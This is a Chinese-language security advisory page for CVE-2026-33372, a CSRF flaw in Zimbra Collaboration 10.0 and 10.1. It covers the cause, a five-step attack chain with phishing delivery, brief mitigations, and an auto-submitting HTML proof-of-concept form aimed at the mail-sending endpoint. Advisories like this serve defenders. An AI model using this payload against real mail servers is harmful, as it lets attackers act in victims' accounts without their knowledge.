IPBUF安全漏洞报告
English
CVE-2026-33372 CVSS 5.4 中危

CVE-2026-33372 Zimbra Collaboration CSRF漏洞

披露日期: 2026-03-20

漏洞信息

漏洞编号
CVE-2026-33372
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Zimbra Collaboration (ZCS)

相关标签

CSRFZimbraWebmailCross-Site Request ForgeryMedium Risk

漏洞概述

Zimbra Collaboration (ZCS) 10.0和10.1版本存在跨站请求伪造(CSRF)漏洞。该漏洞源于Webmail对CSRF令牌验证不当,错误地接受请求体中的令牌而非预期的请求头。攻击者可诱骗已认证用户提交恶意请求,从而以受害者名义执行未授权操作,影响系统机密性与完整性。

技术细节

该漏洞的核心原理在于Zimbra Webmail未能严格执行CSRF防御标准。通常,防御CSRF的最佳实践是将随机令牌放置在自定义HTTP请求头(如X-CSRF-Token)中,因为浏览器在跨域请求时受同源策略限制,无法自动添加自定义头,从而防止第三方网站伪造请求。然而,受影响的Zimbra版本仅校验POST请求Body中的CSRF参数。攻击者可以构造一个恶意HTML页面,利用<form>标签的POST自动提交特性,将获取到的有效令牌(或利用某些令牌逻辑缺陷)放入Body中。一旦已登录的受害者访问该恶意页面,浏览器会自动携带用户的Session Cookie发送请求,服务器因Body中包含有效令牌而验证通过,导致攻击者在受害者不知情的情况下执行敏感操作。

攻击链分析

STEP 1
侦察
攻击者确认目标使用Zimbra Collaboration (ZCS) 10.0或10.1版本,并诱导用户保持登录状态。
STEP 2
构建载荷
攻击者编写恶意HTML页面,构造一个指向Zimbra敏感接口(如发送邮件或修改设置)的表单,并设置CSRF Token参数在请求体中。
STEP 3
投递链接
攻击者通过钓鱼邮件或社会工程学手段,将恶意网页链接发送给目标组织的已登录用户。
STEP 4
触发请求
受害者访问链接,浏览器自动携带Cookie向Zimbra服务器发送包含Body Token的POST请求。
STEP 5
执行操作
Zimbra服务器验证请求体中的Token有效(因Cookie也存在),误以为是用户合法操作,执行攻击者预设的操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-33372: Zimbra Collaboration CSRF Description: Exploits the vulnerability where the CSRF token is accepted in the request body. Usage: Host this file on a server and trick an authenticated Zimbra user to visit it. --> <html> <body> <h2>Zimbra CSRF Exploit</h2> <form action="https://target-zimbra-domain.com/service/soap/SendMsgRequest" method="POST"> <!-- The vulnerable application accepts the token in the body --> <input type="hidden" name="csrf_token" value="VALID_TOKEN_FROM_USER_SESSION" /> <input type="hidden" name="action" value="send_email" /> <input type="hidden" name="to" value="[email protected]" /> <input type="hidden" name="subject" value="CSRF Test" /> <input type="hidden" name="content" value="This email was sent via CSRF." /> <input type="submit" value="Click me to win a prize!" /> </form> <script> // Auto-submit the form on load document.forms[0].submit(); </script> </body> </html>

影响范围

Zimbra Collaboration (ZCS) 10.0
Zimbra Collaboration (ZCS) 10.1

防御指南

临时缓解措施
在未升级补丁前,建议管理员加强对Webmail访问的监控,教育用户不要轻易点击不明链接或访问不可信的网站。可考虑在网络边界部署WAF,对异常的POST请求特征进行拦截。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表